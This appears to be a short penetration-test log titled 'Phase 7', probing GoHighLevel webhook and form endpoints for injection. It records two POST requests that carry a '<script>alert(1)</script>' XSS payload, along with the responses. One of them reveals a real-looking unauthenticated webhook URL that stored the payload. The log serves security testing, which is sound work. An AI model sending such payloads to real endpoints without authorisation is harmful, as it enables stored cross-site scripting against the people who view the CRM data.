=== PHASE 7: GHL WEBHOOK/FORM INJECTION ===

--- Webhook XSS Test ---
Endpoint: POST https://services.leadconnectorhq.com/hooks/8jJylXIxcMrt2E2RW0hW/webhook-trigger/TojDcSAx1jRu84taBZ9s
Payload: {"name":"<script>alert(1)</script>","email":"test@test.com","phone":"555-0000"}
Response Code: 200
Response Body: {"status":"Success: request sent to trigger execution server","id":"01zSwhlq5XbbYpB9wAvq"}

RESULT: ⚠️ PAYLOAD ACCEPTED - XSS content stored in GHL CRM
The webhook has no authentication and accepts arbitrary HTML/script content in fields.

--- GHL Form Submit Test ---
Endpoint: POST https://link.realwave.com/widget/form/submit
Payload: {"locationId":"8jJylXIxcMrt2E2RW0hW","formId":"test","name":"<script>alert(1)</script>","email":"xss@test.com"}
Response Code: 404
Response Body: Cannot POST /widget/form/submit

RESULT: PASS - Endpoint doesn't exist at this path (form submission likely handled differently by GHL embed)